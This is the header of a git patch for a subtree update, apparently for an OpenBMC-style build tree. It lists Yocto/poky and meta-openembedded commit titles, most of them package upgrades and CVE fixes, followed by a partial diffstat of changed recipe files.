From 23c9e5d72a3c26781493044644406f1e94df062d Mon Sep 17 00:00:00 2001 From: Patrick Williams Date: Tue, 8 Feb 2022 13:42:21 -0600 Subject: subtree updates MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit poky: ed4791c8b0..bba3233897: Akash Hadke (1): glibc: Add fix for data races in pthread_create and TLS access Alexander Kanavin (25): gnupg: update 2.2.21 -> 2.2.22 gnupg: update 2.2.23 -> 2.2.26 tcf-agent: fetching over git:// no longer works qemurunner.py: print output from runqemu/qemu-system in stop() qemurunner.py: handle getOutput() having nothing to read selftest: disable virgl headless test wic: keep rootfs_size as integer testimage: symlink the task log and qemu console log to tmp/log/oeqa bitbake: bitbake: correct the collections vs collections.abc deprecation bitbake: bitbake: fix regexp deprecation warnings bitbake: bitbake: do not import imp in layerindexlib bitbake: bitbake: adjust parser error check for python 3.10 compatibility bitbake: bitbake: correct deprecation warning in process.py e2fsprogs: update to 1.45.6 linux-firmware: upgrade 20210511 -> 20210818 linux-firmware: upgrade 20210818 -> 20210919 wireless-regdb: upgrade 2021.04.21 -> 2021.07.14 wireless-regdb: upgrade 2021.07.14 -> 2021.08.28 ca-certificates: update 20210119 -> 20211016 tzdata: upgrade 2021a -> 2021d tzdata: update 2021d -> 2021e linux-firmware: upgrade 20210919 -> 20211027 libpcre/libpcre2: correct SRC_URI lib/oe/reproducible: correctly set .git location when recursively looking for git repos parselogs: add a couple systemd false positives Alexandre Belloni (1): oeqa/selftest/sstatetests: fix typo ware -> were Andrej Valek (3): mklibs-native: drop deprecated cpp17 exceptions vim: add option to disable NLS support libpsl: Add config knobs for runtime/builtin conversion choices Andrey Zhizhikin (1): lttng-modules: do not search in non-existing folder during install Anuj Mittal (3): glibc-version.inc: remove branch= from GLIBC_GIT_URI gstreamer1.0: fix failing ptest xserver-xorg: update CVE_PRODUCT Armin Kuster (24): glibc: Security fix CVE-2021-33574 glibc: Security fix for CVE-2021-38604 qemu: Security fix CVE-2020-25085 qemu: Security fix CVE-2020-25624 Qemu: Security fix for CVE-2020-25625/2021-3409/2020-17380 qemu: Security fix for CVE-2020-29443 qemu: Security fix CVE-2021-20221 qemu: Security fix CVE-2021-3544 qemu: Security fixes CVE-2021-3545/6 binutils: Security fix for CVE-2021-3549 binutils: Security fix for CVE-2020-16593 lz4: Security Fix for CVE-2021-3520 xserver-xorg: Security fix for CVE-2020-14360/-25712 go: Several Security fixes libgcrypt: Security fix CVE-2021-33560 apr: Security fix for CVE-2021-35940 libsndfile: Security fix for CVE-2021-3246 qemu: Security fix CVE-2020-12829 qemu: Security fix for CVE-2020-27617 qemu: Security fix for CVE-2020-28916 nettle: Security fix for CVE-2021-3580 nettle: Security fix for CVE-2021-20305 tar: ignore node-tar CVEs poky.yaml: fedora33: add missing pkgs Bruce Ashfield (21): linux-yocto/5.4: update to v5.4.142 parselogs.py: ignore intermittent CD/DVDROM identification failure linux-yocto/5.4: update to v5.4.143 linux-yocto/5.4: update to v5.4.144 linux-yocto/5.4: update to v5.4.149 linux-yocto/5.4: update to v5.4.150 linux-yocto/5.4: update to v5.4.153 linux-yocto/5.4: update to v5.4.154 linux-yocto/5.4: update to v5.4.155 linux-yocto/5.4: update to v5.4.156 linux-yocto/5.4: update to v5.4.158 linux-yocto/5.4: update to v5.4.159 linux-yocto/5.4: update to v5.4.162 linux-yocto/5.4: update to v5.4.163 linux-yocto/5.4: update to v5.4.165 linux-yocto/5.4: update to v5.4.167 linux-yocto/5.4: update to v5.4.169 linux-yocto/5.4: update to v5.4.170 linux-yocto/5.4: update to v5.4.171 linux-yocto/5.4: update to v5.4.172 kernel: introduce python3-dtschema-wrapper Chandana kalluri (1): scriptutils.py: Add check before deleting path Changqing Li (1): gdk-pixbuf: fix CVE-2021-20240 Chris Laplante (1): bitbake: compat.py: remove file since it no longer actually implements anything Christian Eggers (1): binutils: Fix a missing break in case statement Claudius Heine (1): rng-tools: add systemd-udev-settle wants to service Claus Stovgaard (1): cups: Fix missing installation of cups sysv init scripts Daniel Gomez (1): os-release: Add DISTRO_CODENAME as vardeps for do_compile Daniel McGregor (1): bitbake.conf: Add gpg-agent as a host tool Denys Dmytriyenko (1): make-mod-scripts: pass CROSS_COMPILE to configure and build Dhruva Gole (1): scripts/checklayer/common.py: Fixed a minor grammatical error Eero Aaltonen (1): cmake: FindGTest: Add target for gmock library Ernst Sjöstrand (1): dropbear: Fix CVE-2020-36254 Hongxu Jia (1): nativesdk-pseudo: Fix to work with glibc 2.34 systems Jate Sujjavanich (3): libdnf: Backport bugfix for upgrade calc dnf: Backport bugfix for upgrade bitbake: hashserv: specify loop for asyncio in python < 3.6 Jon Mason (4): Update mailing list address core-image-sato: Fix runqemu error for qemuarmv5 oeqa/manual: Fix no longer valid URLs scripts/lib/wic/help.py: Update Fedora Kickstart URLs Jose Quaresma (3): patch.bbclass: when the patch fails show more info on the fatal error sstate: fix touching files inside pseudo sstate: another fix for touching files inside pseudo Joshua Watt (3): bitbake: server: Fix early parsing errors preventing zombie bitbake classes/reproducible_build: Use atomic rename for SDE file oeqa: reproducible: Fix test not producing diffs Justin Bronder (1): bitbake: hashserv: let asyncio discover the running loop Kai Kang (2): squashfs-tools: fix CVE-2021-40153 speex: fix CVE-2020-23903 Khem Raj (5): m4: Do not use SIGSTKSZ gpgme: Use glibc provided closefrom API when available webkitgtk: Fix reproducibility in minibrowser lrzsz: Use Cross AR during compile libunwind: Backport a fix for -fno-common option to compile Konrad Weihmann (1): cve-check: add lockfile to task Lee Chee Yang (1): qemu: fix CVE-2021-3527 Marco Felsch (1): bitbake: bitbake: bitbake-layers: add skip reason to output Marek Vasut (4): image_types: Restore pre-btrfs-tools 4.14.1 mkfs.btrfs shrink behavior piglit: upgrade to latest revision weston: Backport patches to always activate the top-level surface Revert "weston: Use systemd notify," Mark Hatle (2): externalsrc: Work with reproducible_build reproducible_build: Remove BUILD_REPRODUCIBLE_BINARIES checking Markus Volk (2): util-linux: disable raw wic:direct.py: ignore invalid mountpoints during fstab update Marta Rybczynska (5): lzo: add CVE_PRODUCT python3: upgrade 3.8.11 -> 3.8.12 libgcrypt: solve CVE-2021-33560 and CVE-2021-40528 bluez: fix CVE-2021-0129 grub: fix CVE-2020-14372 and CVE-2020-27779 Matt Madison (1): layer.conf: fix syntax error in PATH setting Michael Halstead (3): uninative: Upgrade to 3.3, support glibc 2.34 uninative: Upgrade to 3.4 releases: update to include 3.1.13 Michael Opdenacker (5): documentation: conf.py: explicit which version of bitbake objects.inv is used available release updates remove reference to BB_SETSCENE_VERIFY_FUNCTION2 documentation: further updates for 3.1.13 ref-manual: fix patch documentation Mike Crowe (1): curl: Fix CVE-2021-22946 and CVE-2021-22947, whitelist CVE-2021-22945 Mikko Rapeli (1): openssl: update from 1.1.1k to 1.1.1l Mingli Yu (3): python3-magic: add the missing rdepends bootchart2: remove wait_boot logic wic: use shutil.which Minjae Kim (5): vim: fix CVE-2021-3778 vim: fix 2021-3796 git: fix CVE-2021-40330 vim: fix CVE-2021-4069 inetutils: fix CVE-2021-40491 Neetika Singh (1): glib-2.0: Add security fixes Nicolas Dechesne (1): rt-tests: set branch name in SRC_URI Oleksandr Kravchuk (1): mirrors.bbclass: remove dead infozip mirrors Oleksandr Popovych (1): utils: Reduce the number of calls to the "dirname" command Ovidiu Panait (2): dbus-test: Remove EXTRA_OECONF_X configs dbus,dbus-test: Move common parts to dbus.inc Pavel Zhukov (3): weston: Use systemd notify, busybox: Fix for CVE-2021-42374 busybox: Fix for CVE-2021-42376 Peter Bergin (1): systemd: add packageconfig for wheel-group Purushottam Choudhary (1): lighttpd: Add patch for reuse large memory chunks Quentin Schulz (1): README.OE-Core.md: update URLs Ralph Siemsen (1): tar: filter CVEs using vendor name Ranjitsinh Rathod (6): rpm: Add fix for CVE-2021-20266 rpm: Handle proper return value to avoid major issues systemd: Add fix for systemd-networkd crash during free curl: Whitelist CVE-2021-22897 ncurses: Fix for CVE-2021-39537 libsolv: update tag for missing CVEs Ricardo Ribalda Delgado (1): wic: misc: Do not find for executables in ASSUME_PROVIDED Richard Purdie (91): gnupg: upgrade 2.2.20 -> 2.2.21 sdk: Decouple default install path from built in path xdg-utils: Add fix for CVE-2020-27748 oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86 machines flex: Add CVE-2019-6293 to exclusions for checks go: Exclude CVE-2021-29923 from report list build-appliance-image: Update to dunfell head revision poky: Use SDKPATHINSTALL instead of SDKPATH build-appliance-image: Update to dunfell head revision bitbake: tests/fetch2: Use our own git server for dtc test repo vim: Backport fix for CVE-2021-3770 useradd: Ensure preinst data is expanded correctly in pkgdata bash: Ensure deterministic build bitbake: ui/taskexp: Improve startup exception handling bitbake: ui/taskexp: Fix to work with empty build directories bitbake: build: Match markup to real function name bitbake: build: Handle SystemExit in python tasks correctly bitbake: process: Don't include logs in error message if piping them bitbake: build: Avoid duplicating logs in verbose mode bitbake: build: Catch and error upon circular task references bitbake: data_smart: Improve error display for handled exceptions bitbake: cookerdata: Improve missing core layer error message bitbake: cookerdata: Show error for no BBLAYERS in bblayers.conf bitbake: bitbake-worker: Improve error handling bitbake: cookerdata: Show a readable error for invalid multiconfig name bitbake: build/msg: Cleanup verbose option handling mtd-utils: upgrade 2.1.1 -> 2.1.2 pybootchart: Avoid divide by zero oeqa/qemurunner: Use oe._exit(), not sys.exit() libc_package/buildstats: Fix python regex quoting warnings oeqa/selftest/gotoolchain: Fix temp file cleanup oeqa/buildproject: Ensure temp directories are cleaned up glew: Stop polluting /tmp during builds bitbake: test/fetch: Update urls to match upstream branch name changes bitbake: fetch2/git: Avoid races over mirror tarball creation bitbake: fetch2/git: Use os.rename instead of mv multilib: Avoid sysroot race issues when multilib enabled pseudo: Fix to work with glibc 2.34 systems pseudo: Update with fcntl and glibc 2.34 fixes package: Ensure pclist files are deterministic and don't use full paths mesa: Ensure megadrivers runtime mappings are deterministic gnupg: Be deterministic about sendmail libtool: Fix lto option passing for reproducible builds libtool: Allow libtool-cross to reproduce gobject-introspection: Don't write $HOME into scripts externalsrc: Fix a source date epoch race in reproducible builds libxml2: Use python3targetconfig to fix reproducibility issue libnewt: Use python3targetconfig to fix reproducibility issue python3: Add a fix for a make install race rpm: Deterministically set vendor macro entry reproducible_build: Work around caching issues base: Clean up unneeded len() calls base: Use repr() for printing exceptions reproducible_build: Drop obsolete sstate workaround git: Fix determinism issue bitbake: fetch/git: Handle github dropping git:// support bitbake: tests/fetch2: Fix quoting warning bitbake: tests/fetch: Update github urls bitbake: tests/fetch: Update pcre.org address after github changes scripts/convert-srcuri: Backport SRC_URI conversion script from master branch meta/scripts: Manual git url branch additions bitbake: fetch/wget: Add timeout for checkstatus calls (30s) linunistring: Add missing gperf-native dependency pseudo: Add in ability to flush database with shutdown request pseudo: Add fcntl64 wrapper mirrors: Add uninative mirror on kernel.org sstate: Ensure SDE is accounted for in package task timestamps sstate: Avoid deploy_source_date_epoch sstate when unneeded mirrors: Add kernel.org sources mirror for downloads.yoctoproject.org build-appliance-image: Update to dunfell head revision bitbake: command: Ensure exceptions inheriting from BBHandledException are visible bitbake: tinfoil: When sending commands we need to process events bitbake: process/knotty: Improve early exception handling scripts/oe-package-browser: Handle no packages being built reproducible_build/package_XXX: Ensure SDE task is in dependency chain bitbake: cooker: Ensure reparsing is handled correctly bitbake: bblayers/action: When adding layers, catch BBHandledException buildhistory: Fix srcrevs output oeqa/parselogs: Fix quoting gcc: Add CVE-2021-37322 to the list of CVEs to ignore build-appliance-image: Update to dunfell head revision bitbake: cooker/command: Add a dummy event for tinfoil testing openssl: Add reproducibility fix oeqa/selftest/bbtests: Use YP sources mirror instead of GNU oeqa/selftest/tinfoil: Update to use test command scripts: Update to use exec_module() instead of load_module() bitbake: utils: Update to use exec_module() instead of load_module() bitbake: tests/fetch: Drop gnu urls from wget connectivity test expat: Update HOMEPAGE to current url lttng-tools: Add missing DEPENDS on bison-native build-appliance-image: Update to dunfell head revision Robert P. J. Day (1): common-licenses: add "Unlicense" license file Ross Burton (20): cpio: backport fix for CVE-2021-38185 libsoup-2.4: remove obsolete intltool dependency uninative: Improve glob to handle glibc 2.34 devtool: fix modify with patches in override directories sstate: don't silently handle all exceptions in sstate_checkhashes oe/license: implement ast.NodeVisitor.visit_Constant license.bbclass: implement ast.NodeVisitor.visit_Constant oe/utils: log exceptions in ThreadedWorker functions testimage: fix unclosed testdata file oeqa/runtime: load modules using importlib oeqa/runtime: search sys.path explicitly for modules vim: fix CVE-2021-3796, CVE-2021-3872, and CVE-2021-3875 vim: add patch number to CVE-2021-3778 patch vim: fix CVE-2021-3927 and CVE-2021-3928 gmp: fix CVE-2021-43618 openssh: remove redundant BSD license vim: fix CVE-2021-3968 and CVE-2021-3973 runqemu: check the qemu PID has been set before kill()ing it cve-update-db-native: use fetch task xserver-xorg: whitelist two CVEs Sakib Sajal (7): qemu: fix CVE-2021-20181 qemu: fix CVE-2021-3416 qemu: fix CVE-2021-20257 qemu: fix CVE-2021-3582 qemu: fix CVE-2021-3607 qemu: fix CVE-2021-3608 qemu: fix CVE-2021-3682 Saloni (1): ffmpeg: Add fix for CVEs Sana Kazi (1): busybox: Fix multiple security issues in awk Saul Wold (1): gnupg: uprev 2.2.22 -> 2.2.23 Stefan Herbrechtsmeier (2): recipetool: Set master branch only as fallback selftest/devtool: Check branch in git fetch Stefano Babic (1): mtd-utils: upgrade 2.1.2 -> 2.1.3 Steve Sakoman (36): documentation: prepare for 3.1.11 release poky.conf: Bump version for 3.1.11 release connman: add CVE_PRODUCT gcc: fix missing dependencies for selftests util-linux: Fix reproducibility target/ssh.py: add HostKeyAlgorithms option to test commands poky.conf: Add fedora 34 as a supported distro poky.conf: Add debian 11 as a supported distro selftest/reproducible: adjust exclusion list for dunfell waffle: old website is down, update to new project URLs stress-ng: convert to git, website is down stress-ng: improve reproducibility meta: Add explict branch to git SRC_URIs, handle github url changes poky.conf: Bump version for 3.1.12 release ref-system-requirements.rst: Add Debian 11 to list of supported distros ref-system-requirements.rst: Add Fedora 34 to list of supported distros documentation: prepare for 3.1.12 release python3-magic: add missing DEPENDS selftest/reproducible: add webkitgtk back to exclusion list for dunfell Revert "vim: fix 2021-3796" bind: update to 9.11.33 bind: update to 9.11.34 bind: update to 9.11.35 poky.conf: Bump version for 3.1.13 release cve-extra-exclusions: add db CVEs to exclusion list selftest: skip virgl test on centos 8 entirely selftest: skip virgl test on fedora 34 entirely libpcre2: update SRC_URI selftest: skip virgl test on fedora 35 asciidoc: properly detect and compare Python versions >= 3.10 valgrind: skip flakey ptest (gdbserver_tests/hginfo) oeqa/selftest/cases/tinfoil.py: increase timeout 60->120s test_wait_event expat fix CVE-2022-22822 through CVE-2022-22827 expat: fix CVE-2021-45960 expat: fix CVE-2021-46143 poky.conf: Bump version for 3.1.14 release Teoh Jay Shen (2): oeqa/runtime/parselogs: modified drm error in common errors list linux-yocto/5.4: update genericx86* machines to v5.4.158 Tim Orling (1): scripts/buildhistory-diff: drop use of distutils Tom Pollard (2): bzip2: Update soname for libbz2 1.0.8 libsamplerate0: Set correct soname for 0.1.9 Visa Hankala (1): iputils: Fix regression of arp table update Wang Mingyu (6): gnupg: upgrade 2.2.26 -> 2.2.27 dbus: upgrade 1.12.16 -> 1.12.18 dbus-test: upgrade 1.12.16 -> 1.12.18 dbus: upgrade 1.12.18 -> 1.12.20 e2fsprogs: upgrade 1.45.6 -> 1.45.7 openssh: Improve LICENSE to show BSD license variants. William A. Kennington III (1): rm_work.bbclass: Fix for files starting with - Yi Zhao (1): oeqa: fix warnings for append operators combined with += jbouchard (1): Use the label provided when formating a dos partition sana kazi (3): openssh: Fix CVE-2021-28041 openssh: Fix CVE-2021-41617 openssh: Whitelist CVE-2016-20012 wangmy (1): linux-firmware: upgrade 20211027 -> 20211216 meta-raspberrypi: 59c2d6f7a8..934064a019: Changqing Li (1): 99-com.rules: fix error invalid substitution type Marcel Hamer (1): recipes: Update SRC_URI protocols for github Pavel Zhukov (1): linux-firmware-rpidistro: Use buster branch instead of master meta-security: 6466c6fb02..b76698c788: Armin Kuster (1): linux-%_5.%.bbappend: drop recipe meta-openembedded: 4a0d93d250..ab9fca485e: Alexander Thoma (1): keyutils: fix install path Anastasios Kavoukis (1): pm-qa: fix paths for shell scripts Andreas Weger (3): spirv-tools: Define SRCREV_FORMAT grpc: Define SRCREV_FORMAT drdb-utils: Define SRCREV_FORMAT Armin Kuster (7): xterm: Security fix for CVE-2021-27135 tcpdump: Exclude CVE-2020-8036 from check nss: Two Security fixes CVE-2020-6829 and 12400 dnsmasq: Security fix CVE-2021-3448 Apache: Several CVE fixes redis: update to 5.0.14 recipes: Update SRC_URI branch and protocols Armin kuster (1): dovecot: refresh patches Changqing Li (1): apache2: upgrade 2.4.46 -> 2.4.48 Ernst Sjöstrand (1): libmicrohttpd: Add patch to fix CVE-2021-3466 Gianfranco (3): dlt-daemon: update to 2.18.5 dlt-daemon: fix build failure when dlt-dbus is enabled, due to missing service file. dlt-daemon: update from 2.18.6 to 2.18.7 Gianfranco Costamagna (3): dlt-daemon: fix build with upstream-proposed patch for MUSL libc dlt-daemon: superseed upstream pr #238 patch with pr #245 due to unexpected behaviour dlt-daemon: update to new release 2.18.6 Jeremy Puhlman (1): c-ares: switch from master to main Khem Raj (2): gst-shark: Define SRCREV_FORMAT android-tools: Define SRCREV_FORMAT Konrad Weihmann (1): gattlib: remove includedir from base package Marek Vasut (1): dstat: Add missing python-six runtime dependency Marta Rybczynska (1): jansson: whitelist CVE-2020-36325 Martin Jansa (1): sdbus-c++: don't fetch googletest during do_configure Maíra Canal via (1): python3-fasteners: update 0.15 -> 0.16.3 Neetika Singh (1): c-ares: Add fix for CVE-2021-3672 Pierre-Jean Texier (1): stunnel: upgrade 5.56 -> 5.57 Purushottam Choudhary (1): tcpdump: Update CVE-2020-8037 tag Ranjitsinh Rathod (1): nss: Fix CVE-2020-12403 Richard Purdie (1): gattlib: Place pkgconfig file in correct package Robert Joslyn (1): postgresql: Update to 12.9 Spectrejan (1): brotli: add patch to fix CVE-2020-8927 Yi Zhao (3): krb5: fix CVE-2021-36222 postfix: fix build with glibc 2.34 postfix: upgrade 3.4.12 -> 3.4.23 Zang Ruochen (1): c-ares: upgrade 1.16.0 -> 1.16.1 lumag (1): lmsensors: do not depend on lmsensors-isatools on non-x86 sana kazi (4): dovecot: Fix CVE-2020-12100 dovecot: Fix CVE-2020-12673 dovecot: Fix CVE-2020-12674 nss: Fix CVE-2021-43527 wangmy (1): apache2: upgrade 2.4.48 -> 2.4.49 Signed-off-by: Patrick Williams Change-Id: Ic7c24b8b9d1566d6273e388c20d242dbfeaf08de --- .../logfsprogs/logfsprogs_git.bb | 2 +- .../recipes-filesystems/owfs/owfs_3.2p3.bb | 2 +- .../sshfs-fuse/sshfs-fuse_3.7.0.bb | 2 +- .../unionfs-fuse/unionfs-fuse_2.1.bb | 2 +- .../recipes-utils/f2fs-tools/f2fs-tools_1.13.0.bb | 2 +- .../recipes-utils/fatcat/fatcat_1.1.0.bb | 2 +- .../recipes-utils/fatresize/fatresize_1.0.2.bb | 2 +- .../recipes-utils/ufs-utils/ufs-utils_git.bb | 2 +- .../libchamplain/libchamplain_0.12.20.bb | 2 +- .../meta-gnome/recipes-support/ibus/ibus.inc | 2 +- .../recipes-support/keybinder/keybinder_3.0.bb | 2 +- .../recipes-support/libhandy/libhandy_git.bb | 2 +- .../recipes-support/libstemmer/libstemmer_git.bb | 2 +- .../recipes-support/libwacom/libwacom_0.33.bb | 2 +- .../recipes-bsp/kexecboot/kexecboot_git.bb | 2 +- .../recipes-devtools/dracut/dracut_git.bb | 2 +- .../recipes-devtools/grubby/grubby_8.40.bb | 2 +- .../recipes-devtools/grubby/grubby_git.bb | 2 +- .../recipes-devtools/mtd/ubi-utils-klibc_2.0.2.bb | 2 +- .../recipes-kernel/kexec/kexec-tools-klibc_git.bb | 2 +- .../recipes-connectivity/libupnp/libupnp_git.bb | 2 +- .../recipes-dvb/tvheadend/tvheadend_git.bb | 2 +- .../recipes-multimedia/dca/dcadec_0.2.0.bb | 2 +- .../dleyna/dleyna-connector-dbus_0.3.0.bb | 2 +- .../recipes-multimedia/dleyna/dleyna-core_0.6.0.bb | 2 +- .../dleyna/dleyna-renderer_0.6.0.bb | 2 +- .../dleyna/dleyna-server_0.6.0.bb | 2 +- .../recipes-multimedia/fdk-aac/fdk-aac_2.0.1.bb | 2 +- .../recipes-multimedia/fluidsynth/fluidsynth.inc | 2 +- .../recipes-multimedia/gerbera/gerbera_git.bb | 2 +- .../gstreamer-1.0/gst-shark_git.bb | 4 +- .../recipes-multimedia/libcamera/libcamera.bb | 2 +- .../libdvbcsa/libdvbcsa_1.1.0.bb | 2 +- .../recipes-multimedia/libsquish/libsquish_git.bb | 2 +- .../recipes-multimedia/mimic/mimic_1.2.0.2.bb | 2 +- .../musicbrainz/libmusicbrainz_git.bb | 2 +- .../musicpd/libmpdclient_2.16.bb | 2 +- .../recipes-multimedia/musicpd/mpc_0.31.bb | 2 +- .../recipes-multimedia/musicpd/mpd_0.20.22.bb | 2 +- .../recipes-multimedia/musicpd/ncmpc_0.34.bb | 2 +- .../recipes-multimedia/mycroft/mycroft_19.8.1.bb | 2 +- .../openal/openal-soft_1.19.1.bb | 2 +- .../recipes-multimedia/rtmpdump/rtmpdump_2.4.bb | 2 +- .../recipes-multimedia/tinyalsa/tinyalsa.bb | 2 +- .../recipes-multimedia/tremor/tremor_20180319.bb | 2 +- .../recipes-support/crossguid/crossguid.bb | 2 +- .../gst-instruments/gst-instruments_git.bb | 2 +- .../cannelloni/cannelloni_git.bb | 2 +- .../recipes-connectivity/civetweb/civetweb_git.bb | 2 +- .../recipes-connectivity/dibbler/dibbler_git.bb | 2 +- .../freeradius/freeradius_3.0.20.bb | 2 +- .../recipes-connectivity/libdnet/libdnet_1.12.bb | 2 +- .../recipes-connectivity/nanomsg/nanomsg_1.1.5.bb | 2 +- .../recipes-connectivity/nanomsg/nng_1.2.5.bb | 2 +- .../recipes-connectivity/netplan/netplan_0.98.bb | 2 +- .../openconnect/openconnect_8.03.bb | 2 +- .../recipes-connectivity/relayd/relayd_git.bb | 2 +- .../recipes-connectivity/vpnc/vpnc_0.5.3.bb | 2 +- .../recipes-connectivity/wolfssl/wolfssl_4.4.0.bb | 2 +- .../recipes-daemons/atftp/atftp_0.7.2.bb | 2 +- .../cyrus-sasl/cyrus-sasl_2.1.27.bb | 2 +- .../iscsi-initiator-utils_2.1.3.bb | 2 +- .../networkd-dispatcher_2.0.1.bb | 2 +- .../files/0001-fix-build-with-glibc-2.34.patch | 46 + .../recipes-daemons/postfix/postfix_3.4.12.bb | 18 - .../recipes-daemons/postfix/postfix_3.4.23.bb | 19 + .../arno-iptables-firewall_2.1.0.bb | 2 +- .../libnetfilter/libnetfilter-log_1.0.1.bb | 2 +- .../libnetfilter/libnetfilter-queue_1.0.3.bb | 2 +- .../recipes-filter/libnftnl/libnftnl_1.1.7.bb | 2 +- .../meta-networking/recipes-irc/znc/znc_1.7.5.bb | 4 +- .../wireguard/wireguard-module_1.0.20200401.bb | 2 +- .../wireguard/wireguard-tools_1.0.20200319.bb | 2 +- .../recipes-protocols/babeld/babeld_1.9.1.bb | 2 +- .../recipes-protocols/openflow/openflow.inc | 2 +- .../recipes-protocols/xl2tpd/xl2tpd_1.3.14.bb | 2 +- .../recipes-support/arptables/arptables_git.bb | 2 +- .../bridge-utils/bridge-utils_1.6.bb | 2 +- .../recipes-support/cifs/cifs-utils_6.10.bb | 2 +- .../recipes-support/curlpp/curlpp_0.8.1.bb | 2 +- .../dnsmasq/dnsmasq/CVE-2021-3448.patch | 1040 + .../recipes-support/dnsmasq/dnsmasq_2.81.bb | 1 + ...001-auth-mech-rpa-Fail-on-zero-len-buffer.patch | 30 + ...c-convert-AC_TRY_RUN-to-AC_TRY_LINK-state.patch | 19 +- .../dovecot/0001-doveadm-Fix-parallel-build.patch | 13 +- ...ssage-parser-Add-a-message_part_finish-he.patch | 76 + ...ssage-parser-Change-message_part_append-t.patch | 71 + ...lib-ntlm-Check-buffer-length-on-responses.patch | 37 + ...ssage-parser-Optimize-updating-children_c.patch | 49 + ...ssage-parser-Optimize-appending-new-part-.patch | 90 + ...ssage-parser-Minor-code-cleanup-to-findin.patch | 45 + ...ssage-parser-Truncate-excessively-long-MI.patch | 163 + ...ssage-parser-Optimize-boundary-lookups-wh.patch | 72 + ...ssage-parser-Add-boundary_remove_until-he.patch | 50 + ...ssage-parser-Don-t-use-memory-pool-for-pa.patch | 169 + ...ssage-parser-Support-limiting-max-number-.patch | 188 + ...ssage-parser-Support-limiting-max-number-.patch | 87 + ...-Fix-handling-trailing-in-MIME-boundaries.patch | 133 + ...mail-Fix-parse_too_many_nested_mime_parts.patch | 32 + .../dovecot/dovecot/buffer_free_fix.patch | 27 + .../recipes-support/dovecot/dovecot_2.2.36.4.bb | 16 + .../recipes-support/drbd/drbd-utils_9.12.0.bb | 5 +- .../recipes-support/geoip/geoip-perl_1.51.bb | 2 +- .../recipes-support/geoip/geoip_1.6.12.bb | 2 +- .../recipes-support/ifenslave/ifenslave_2.9.bb | 2 +- .../recipes-support/ipcalc/ipcalc_0.2.3.bb | 2 +- .../lksctp-tools/lksctp-tools_1.0.18.bb | 2 +- .../lowpan-tools/lowpan-tools_git.bb | 2 +- .../recipes-support/mtr/mtr_0.93.bb | 2 +- .../recipes-support/nbdkit/nbdkit_git.bb | 2 +- .../recipes-support/ndisc6/ndisc6_git.bb | 2 +- .../recipes-support/netcf/netcf_0.2.8.bb | 2 +- .../recipes-support/netperf/netperf_git.bb | 2 +- .../recipes-support/nis/yp-tools_4.2.3.bb | 2 +- .../recipes-support/ntimed/ntimed_git.bb | 2 +- .../recipes-support/open-isns/open-isns_0.99.bb | 2 +- .../recipes-support/phytool/phytool.bb | 2 +- .../recipes-support/rdma-core/rdma-core_28.0.bb | 2 +- .../recipes-support/smcroute/smcroute_2.4.4.bb | 2 +- .../recipes-support/spice/spice-protocol_git.bb | 2 +- .../recipes-support/spice/spice_git.bb | 4 +- .../recipes-support/spice/usbredir_0.8.0.bb | 2 +- .../recipes-support/stunnel/stunnel_5.56.bb | 37 - .../recipes-support/stunnel/stunnel_5.57.bb | 36 + ...-escaping-don-t-allocate-a-too-large-buff.patch | 1 + .../recipes-support/tcpdump/tcpdump_4.9.3.bb | 5 + .../recipes-support/unbound/unbound_1.9.4.bb | 2 +- .../recipes-support/wpan-tools/wpan-tools_0.9.bb | 2 +- .../speedtest-cli/speedtest-cli_2.1.2.bb | 2 +- .../meta-python/recipes-bsp/rwmem/rwmem_1.2.bb | 2 +- .../meta-python/recipes-dbs/mongodb/mongodb_git.bb | 2 +- .../recipes-extended/lcdproc/lcdproc_git.bb | 2 +- .../recipes-benchmark/cpuburn/cpuburn-arm_git.bb | 2 +- .../meta-oe/recipes-benchmark/fio/fio_3.17.bb | 2 +- .../recipes-benchmark/glmark2/glmark2_git.bb | 2 +- .../meta-oe/recipes-benchmark/iperf3/iperf3_3.7.bb | 2 +- .../recipes-benchmark/libc-bench/libc-bench_git.bb | 2 +- .../libhugetlbfs/libhugetlbfs_git.bb | 2 +- .../stressapptest/stressapptest_1.0.9.bb | 2 +- .../tinymembench/tinymembench_git.bb | 2 +- .../recipes-bsp/cpufrequtils/cpufrequtils_008.bb | 2 +- .../recipes-bsp/edac-utils/edac-utils_git.bb | 2 +- .../meta-oe/recipes-bsp/ledmon/ledmon_git.bb | 2 +- .../recipes-bsp/lm_sensors/lmsensors_3.6.0.bb | 4 +- .../recipes-bsp/nvme-cli/nvme-cli_1.10.1.bb | 2 +- .../recipes-connectivity/gattlib/gattlib_git.bb | 6 +- .../recipes-connectivity/gensio/gensio_1.5.3.bb | 2 +- .../meta-oe/recipes-connectivity/iwd/iwd_1.9.bb | 2 +- .../krb5/krb5/CVE-2021-36222.patch | 121 + .../recipes-connectivity/krb5/krb5_1.17.1.bb | 1 + .../libimobiledevice/libimobiledevice_git.bb | 2 +- .../recipes-connectivity/libndp/libndp_1.7.bb | 2 +- .../libtorrent/libtorrent_git.bb | 2 +- .../recipes-connectivity/libuv/libuv_1.36.0.bb | 2 +- .../paho-mqtt-c/paho-mqtt-c_1.3.2.bb | 2 +- .../rabbitmq-c/rabbitmq-c_0.10.0.bb | 2 +- .../recipes-connectivity/rtorrent/rtorrent_git.bb | 2 +- .../recipes-connectivity/usbmuxd/usbmuxd_git.bb | 2 +- .../wifi-test-suite/wifi-test-suite_git.bb | 2 +- .../recipes-connectivity/zeromq/cppzmq_git.bb | 2 +- .../recipes-core/dbus/dbus-daemon-proxy_git.bb | 2 +- .../meta-oe/recipes-core/emlog/emlog.inc | 2 +- .../meta-oe/recipes-core/glfw/glfw_3.3.bb | 2 +- .../meta-oe/recipes-core/libnfc/libnfc_git.bb | 2 +- .../meta-oe/recipes-core/mdbus2/mdbus2_git.bb | 2 +- .../meta-oe/recipes-core/ndctl/ndctl_v67.bb | 2 +- .../opencl-headers/opencl-headers_git.bb | 2 +- .../opencl-icd-loader/opencl-icd-loader_git.bb | 2 +- .../meta-oe/recipes-core/safec/safec_3.5.1.bb | 2 +- ...t-find-googletest-in-the-system-before-do.patch | 96 + .../sdbus-c++/sdbus-c++-libsystemd_243.bb | 2 +- .../recipes-core/sdbus-c++/sdbus-c++_0.8.1.bb | 9 +- .../recipes-crypto/libkcapi/libkcapi_git.bb | 2 +- .../pkcs11-helper/pkcs11-helper_1.26.bb | 2 +- .../meta-oe/recipes-dbs/leveldb/leveldb_1.22.bb | 2 +- .../files/0001-Add-support-for-RISC-V.patch | 6 +- .../recipes-dbs/postgresql/postgresql_12.7.bb | 